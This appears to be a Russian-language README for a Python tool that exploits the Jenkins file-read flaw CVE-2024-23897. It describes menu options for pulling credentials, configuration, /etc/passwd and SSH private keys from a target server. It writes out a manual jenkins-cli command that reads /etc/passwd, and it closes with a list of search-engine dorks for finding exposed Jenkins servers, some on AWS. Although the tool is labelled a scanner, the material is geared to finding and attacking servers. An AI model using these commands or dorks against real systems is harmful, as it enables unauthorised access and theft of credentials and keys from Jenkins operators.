
Скрипт на Python для автоматизации уязвимости CVE-2024-23897
Затронутые версии:
Скрипт на Python для автоматизации уязвимости CVE-2024-23897 🤖 🛠️
Этот код на Python представляет собой сканер для конкретной уязвимости (CVE-2024-23897) на серверах Jenkins. Он начинается с запроса URL сервера Jenkins у пользователя. Затем предлагает возможность загрузить файл "jenkins-cli.jar", необходимый для взаимодействия с Jenkins из командной строки. После этого отображается меню опций, включающее выполнение таких команд, как получение информации о сервере, окружении, конфигурации Jenkins, пользователях, учетных данных, а также чтение чувствительных файлов, таких как "/etc/passwd", "/etc/os-release" и "id_rsa". После выбора опции меню выполняется соответствующая команда на указанном сервере Jenkins. Код структурирован с функциями для загрузки файла и выполнения команд, а также основной функцией для управления потоком программы.
Запуск для сервера Jenkins 📝:
python3 CVE-2024-23897-A-scaner.py
Запуск для сервера Jenkins В DOCKER 📝:
python3 CVE-2024-23897-B-DOCKER-scaner.py
---------------------------------------------------------------------------------------------------------------------------------
ручной запуск.
1- загрузить jenkins-cli.jar : http:///jnlpJars/jenkins-cli.jar
2- для выполнения LFI, выполните: java -jar jenkins-cli.jar -s http://172.17.0.2:8080/ -http connect-node "@/etc/passwd"
dork list:
intitle:"Dashboard [Jenkins]" inurl:"/login"
intitle:"Jenkins" "Dashboard"
inurl:"/computer/" intitle:"Jenkins"
inurl:"/script" intitle:"Jenkins"
"Jenkins [Jenkins]" intitle:"Login"
intitle:"Jenkins" "Jenkins ver. 2.441"
inurl:"/manage" intitle:"Jenkins"
site:.com intitle:"Jenkins"
site:aws.amazon.com intitle:"Jenkins"
filetype:xml inurl:"jenkins/config.xml"